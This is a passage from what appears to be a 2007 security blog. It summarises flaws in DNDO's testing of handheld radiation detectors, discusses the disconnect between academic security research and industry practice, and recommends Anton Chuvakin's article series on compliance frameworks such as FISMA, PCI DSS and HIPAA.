  • DNDO did not objectively test the performance of handheld detectors because they did not use a critical CBP standard operating procedure that is fundamental to this equipment’s performance in the field.

(emphasis added)
Let's summarize.

  • DNDO helped the vendor tune the detector.

  • DNDO did not test how the detectors could fail.

  • DNDO did not test the detectors' resistance to evasion.

  • DNDO failed to follow an important standard operating procedure.


I found all of this interesting and relevant to discussions of detecting security events.

Monday, 17 September 2007

The Academic Trap

I really enjoyed Anton's post Once More on Failure of Academic Research in Security, where he cites Ian Grigg's The Failure of the Academic Contribution to Security Science:

[A]cademics have presented stuff that is sometimes interesting but rarely valuable. They've pretty much ignored all the work that was done before hand, and they've consequently missed the big picture.

Why is this? One reason is above: academic work is only serious if it quotes other academic work. The papers above are reputable because they quote, only and fulsomely, other reputable work. And the work is only rewarded to the extent that it is quoted ... again by academic work.

The academics are caught in a trap: work outside academia and be rejected or perhaps worse, ignored. Or, work with academic references, and work with an irrelevant rewarding base. And be ignored, at least by those who are monetarily connected to the field.

By way of thought experiment, consider how many peer-review committees on security conferences include the experts in the field?


This is very interesting, but I'm not sure I agree. I think another reason might be the lack of ex-practitioners (with military and/or commercial hands-on experience) in the teaching ranks. Whatever the case, the problem should not be restricted to our field; there must be dozens of other professions with similar disconnects between academia and industry.

Incidentally, I was just invited to be on the peer-review committee for VizSec 2008, in conjunction with RAID 2008, in Boston next September. I am really excited to be attending both conferences. Maybe inviting me to be on the board is an indication of academia reaching out to industry?

A focus on practicality is one of the reasons I am drawn to the University of Cambridge Computer Laboratory, which emphasizes actionable security research over theory.

Anton Chuvakin's Age of Compliance Reports

I didn't pay close enough attention when Anton Chuvakin first mentioned this series of articles he's writing. His "Age of Compliance" series addresses various operational security issues and then describes how certain legal frameworks (Federal Information Security Management Act, Payment Card Industry Data Security Standard, Health Insurance Portability and Accountability Act, etc.) influence those activities.

Thus far Anton has published several installments in the series.

These are great if you are trying to cite regulations for justifying security funding.